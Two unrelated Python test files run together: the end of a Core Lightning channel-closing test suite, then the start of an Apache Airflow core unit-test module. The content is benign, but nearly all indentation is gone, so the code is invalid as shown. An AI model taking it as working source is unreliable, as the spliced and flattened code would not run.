wait_for(lambda: only_one(l2.rpc.listpeers()['peers'])['channels'][0]['state'] == 'CLOSINGD_COMPLETE')
@pytest.mark.developer("needs dev_disconnect")
def test_htlc_rexmit_while_closing(node_factory, executor):
"""Retranmitting an HTLC revocation while shutting down should work"""
# l1 disconnects after sending second COMMITMENT_SIGNED.
# Then it stops receiving after sending WIRE_SHUTDOWN (which is before it
# reads the revoke_and_ack).
disconnects = ['+WIRE_COMMITMENT_SIGNED*2',
'xWIRE_SHUTDOWN']
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True,
'dev-no-reconnect': None,
'disconnect': disconnects},
{'may_reconnect': True,
'dev-no-reconnect': None}])
# Start payment, will disconnect
l1.pay(l2, 200000)
wait_for(lambda: only_one(l1.rpc.listpeers()['peers'])['connected'] is False)
# Tell it to close (will block)
fut = executor.submit(l1.rpc.close, l2.info['id'])
# Original problem was with multiple disconnects, but to simplify we make
# l2 send shutdown too.
fut2 = executor.submit(l2.rpc.close, l1.info['id'])
# Reconnect, shutdown will continue disconnect again
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# Now l2 should be in CLOSINGD_SIGEXCHANGE, l1 still waiting on
# WIRE_REVOKE_AND_ACK.
wait_for(lambda: only_one(only_one(l2.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_SIGEXCHANGE')
assert only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CHANNELD_SHUTTING_DOWN'
# They don't realize they're not talking, so disconnect and reconnect.
l1.rpc.disconnect(l2.info['id'], force=True)
# Now it hangs, since l1 is expecting rexmit of revoke-and-ack.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
fut.result(TIMEOUT)
fut2.result(TIMEOUT)
@pytest.mark.openchannel('v1')
@pytest.mark.developer("needs dev_disconnect")
def test_you_forgot_closed_channel(node_factory, executor):
"""Ideally you'd keep talking to us about closed channels: simple"""
disconnects = ['@WIRE_CLOSING_SIGNED']
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True,
'dev-no-reconnect': None},
{'may_reconnect': True,
'dev-no-reconnect': None,
'disconnect': disconnects}])
l1.pay(l2, 200000)
fut = executor.submit(l1.rpc.close, l2.info['id'])
# l2 considers the closing done, l1 does not
wait_for(lambda: only_one(only_one(l2.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_COMPLETE')
assert only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_SIGEXCHANGE'
# l1 reconnects, it should succeed.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
fut.result(TIMEOUT)
@pytest.mark.developer("needs dev_disconnect")
def test_you_forgot_closed_channel_onchain(node_factory, bitcoind, executor):
"""Ideally you'd keep talking to us about closed channels: even if close is mined"""
disconnects = ['@WIRE_CLOSING_SIGNED']
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True,
'dev-no-reconnect': None},
{'may_reconnect': True,
'dev-no-reconnect': None,
'disconnect': disconnects}])
l1.pay(l2, 200000)
fut = executor.submit(l1.rpc.close, l2.info['id'])
# l2 considers the closing done, l1 does not
wait_for(lambda: only_one(only_one(l2.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_COMPLETE')
assert only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_SIGEXCHANGE'
# l1 does not see any new blocks.
def no_new_blocks(req):
return {"result": {"blockhash": None, "block": None}}
l1.daemon.rpcproxy.mock_rpc('getrawblockbyheight', no_new_blocks)
# Close transaction mined
bitcoind.generate_block(1, wait_for_mempool=1)
wait_for(lambda: only_one(only_one(l2.rpc.listpeers()['peers'])['channels'])['state'] == 'ONCHAIN')
# l1 reconnects, it should succeed.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
fut.result(TIMEOUT)
@unittest.skipIf(TEST_NETWORK == 'liquid-regtest', "Uses regtest addresses")
@pytest.mark.developer("too slow without fast polling for blocks")
def test_segwit_anyshutdown(node_factory, bitcoind, executor):
"""Try a range of future segwit versions for shutdown"""
l1, l2 = node_factory.line_graph(2, fundchannel=False)
l1.fundwallet(10**7)
# Based on BIP-320, but all changed to regtest.
addrs = ("BCRT1QW508D6QEJXTDG4Y5R3ZARVARY0C5XW7KYGT080",
"bcrt1qrp33g0q5c5txsp9arysrx4k6zdkfs4nce4xj0gdcccefvpysxf3qzf4jry",
"bcrt1pw508d6qejxtdg4y5r3zarvary0c5xw7kw508d6qejxtdg4y5r3zarvary0c5xw7k0ylj56",
"BCRT1SW50QT2UWHA",
"bcrt1zw508d6qejxtdg4y5r3zarvaryv2wuatf",
"bcrt1qqqqqp399et2xygdj5xreqhjjvcmzhxw4aywxecjdzew6hylgvseswlauz7",
"bcrt1pqqqqp399et2xygdj5xreqhjjvcmzhxw4aywxecjdzew6hylgvsesyga46z",
"bcrt1p0xlxvlhemja6c4dqv22uapctqupfhlxm9h8z3k2e72q4k9hcz7vqc8gma6")
for addr in addrs:
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 10**6)
# If we don't actually make a payment, two of the above cases fail
# because the resulting tx is too small! Balance channel so close
# has two outputs.
bitcoind.generate_block(1, wait_for_mempool=1)
wait_for(lambda: any([c['state'] == 'CHANNELD_NORMAL' for c in only_one(l1.rpc.listpeers()['peers'])['channels']]))
l1.pay(l2, 10**9 // 2)
l1.rpc.close(l2.info['id'], destination=addr)
bitcoind.generate_block(1, wait_for_mempool=1)
wait_for(lambda: all([c['state'] == 'ONCHAIN' for c in only_one(l1.rpc.listpeers()['peers'])['channels']]))
@pytest.mark.developer("needs to manipulate features")
@unittest.skipIf(TEST_NETWORK == 'liquid-regtest', "Uses regtest addresses")
def test_anysegwit_close_needs_feature(node_factory, bitcoind):
"""Rather than have peer reject our shutdown, we should refuse to shutdown toa v1+ address if they don't support it"""
# L2 says "no option_shutdown_anysegwit"
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True},
{'may_reconnect': True,
'dev-force-features': -27}])
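    # ('dev-force-features': -27 strips feature bit 27, the optional bit for
    # option_shutdown_anysegwit, so l2 advertises no anysegwit shutdown support.)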
with pytest.raises(RpcError, match=r'Peer does not allow v1\+ shutdown addresses'):
l1.rpc.close(l2.info['id'], destination='bcrt1pw508d6qejxtdg4y5r3zarvary0c5xw7kw508d6qejxtdg4y5r3zarvary0c5xw7k0ylj56')
# From TFM: "Tell your friends to upgrade!"
l2.stop()
del l2.daemon.opts['dev-force-features']
l2.start()
# Now it will work!
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.close(l2.info['id'], destination='bcrt1pw508d6qejxtdg4y5r3zarvary0c5xw7kw508d6qejxtdg4y5r3zarvary0c5xw7k0ylj56')
wait_for(lambda: only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_COMPLETE')
bitcoind.generate_block(1, wait_for_mempool=1)
def test_close_feerate_range(node_factory, bitcoind, chainparams):
"""Test the quick-close fee range negotiation"""
l1, l2 = node_factory.line_graph(2)
notifications = []
def save_notifications(message, progress, request, **kwargs):
notifications.append(message)
# Lowball the range here.
with l1.rpc.notify(save_notifications):
l1.rpc.close(l2.info['id'], feerange=['253perkw', 'normal'])
if not chainparams['elements']:
l1_range = [138, 4110]
l2_range = [1027, 1000000]
else:
# That fee output is a little chunky.
l1_range = [175, 5212]
l2_range = [1303, 1000000]
l1.daemon.wait_for_log('Negotiating closing fee between {}sat and {}sat satoshi'.format(l1_range[0], l1_range[1]))
l2.daemon.wait_for_log('Negotiating closing fee between {}sat and {}sat satoshi'.format(l2_range[0], l2_range[1]))
overlap = [max(l1_range[0], l2_range[0]), min(l1_range[1], l2_range[1])]
l1.daemon.wait_for_log('performing quickclose in range {}sat-{}sat'.format(overlap[0], overlap[1]))
log = l1.daemon.is_in_log('Their actual closing tx fee is .*sat')
rate = re.match('.*Their actual closing tx fee is ([0-9]*sat).*', log).group(1)
assert notifications == ['Sending closing fee offer {}, with range {}sat-{}sat'.format(rate,
l1_range[0],
l1_range[1]),
'Received closing fee offer {}, with range {}sat-{}sat'.format(rate,
l2_range[0],
l2_range[1])]
def test_close_twice(node_factory, executor):
# First feerate is too low, second fixes it.
l1, l2 = node_factory.line_graph(2, opts=[{'allow_warning': True,
'may_reconnect': True},
{'allow_warning': True,
'may_reconnect': True,
'feerates': (15000, 15000, 15000, 15000)}])
# This makes it disconnect, since feerate is too low.
fut = executor.submit(l1.rpc.close, l2.info['id'], feerange=['253perkw', '500perkw'])
l1.daemon.wait_for_log('WARNING.*Unable to agree on a feerate')
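    # (l2 estimates ~15000perkw, far above the 500perkw ceiling we offered, so
    # the ranges cannot overlap; the retry below raises the ceiling to 15000perkw.)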
fut2 = executor.submit(l1.rpc.close, l2.info['id'], feerange=['253perkw', '15000perkw'])
# Now reconnect, it should work.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
assert fut.result(TIMEOUT)['type'] == 'mutual'
assert fut2.result(TIMEOUT)['type'] == 'mutual'
|
core.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import json
import unittest
import bleach
import doctest
import mock
import multiprocessing
import os
import re
import signal
import sqlalchemy
import tempfile
import warnings
from datetime import timedelta
from dateutil.relativedelta import relativedelta
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from freezegun import freeze_time
from numpy.testing import assert_array_almost_equal
from six.moves.urllib.parse import urlencode
from time import sleep
from airflow import configuration
from airflow.executors import SequentialExecutor
from airflow.models import Variable
configuration.load_test_config()
from airflow import jobs, models, DAG, utils, macros, settings, exceptions
from airflow.models import BaseOperator
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.bin import cli
from airflow.www import app as application
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.timezone import datetime
from airflow.utils.state import State
from airflow.utils.dates import infer_time_unit, round_time, scale_time_units
from lxml import html
from airflow.exceptions import AirflowException
from airflow.configuration import AirflowConfigException, run_command
from jinja2.sandbox import SecurityError
from jinja2 import UndefinedError
import six
NUM_EXAMPLE_DAGS = 19
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
try:
import cPickle as pickle
except ImportError:
# Python 3
import pickle
def reset(dag_id=TEST_DAG_ID):
session = Session()
tis = session.query(models.TaskInstance).filter_by(dag_id=dag_id)
tis.delete()
session.commit()
session.close()
reset()
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super(OperatorSubclass, self).__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
    def execute(self, *args, **kwargs):
pass
class CoreTest(unittest.TestCase):
default_scheduler_args = {"num_runs": 1}
def setUp(self):
configuration.load_test_config()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_previous_runs')
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = timedelta(hours=1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous',
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=models.DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_once')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_start_end_dates',
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
@freeze_time('2016-01-01')
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
start_date = DEFAULT_DATE
runs = 365
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only',
start_date=start_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(configuration.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
with warnings.catch_warnings(record=True) as w:
t = BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertTrue(
issubclass(w[0].category, PendingDeprecationWarning))
self.assertIn(
'Invalid arguments were passed to BashOperator.',
w[0].message.args[0])
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command=u"echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_trigger_dagrun(self):
def trigga(context, obj):
if True:
return obj
t = TriggerDagRunOperator(
task_id='test_trigger_dagrun',
trigger_dag_id='example_bash_operator',
python_callable=trigga,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
provide_context=True,
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_variable(self):
"""
Test the availability of variables in templates
"""
val = {
'test_value': 'a test value'
}
Variable.set("a_variable", val['test_value'])
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable(self):
"""
Test the availability of variables (serialized as JSON) in templates
"""
val = {
'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value']['obj']['v2'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.json.a_variable.obj.v2 }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable_as_value(self):
"""
Test the availability of variables (serialized as JSON) in templates, but
accessed as a value
"""
val = {
'test_value': {'foo': 'bar'}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
u'{"foo": "bar"}')
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
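        # Taken together, the three templating tests above show the two access
        # paths: var.json.<key> deserializes the stored JSON before attribute
        # access, while var.value.<key> returns the stored string as-is.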
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject(object):
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_import_examples(self):
self.assertEqual(len(self.dagbag.dags), NUM_EXAMPLE_DAGS)
def test_local_task_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_doctests(self):
modules = [utils, macros]
for mod in modules:
failed, tests = doctest.testmod(mod)
if failed:
raise Exception("Failed a doctest")
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
# Check the returned value, and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_parameterized_config_gen(self):
cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(configuration.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.get('core', 'FERNET_KEY')
configuration.set("core", "FERNET_KEY_CMD", "printf HELLO")
FALLBACK_FERNET_KEY = configuration.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
# restore the conf back to the original state
configuration.remove_option("core", "FERNET_KEY_CMD")
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(configuration.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.get("core", "FERNET_KEY")
configuration.remove_option("core", "FERNET_KEY")
with self.assertRaises(AirflowConfigException) as cm:
configuration.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
# restore the conf back to the original state
configuration.set("core", "FERNET_KEY", FERNET_KEY)
self.assertTrue(configuration.has_option("core", "FERNET_KEY"))
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
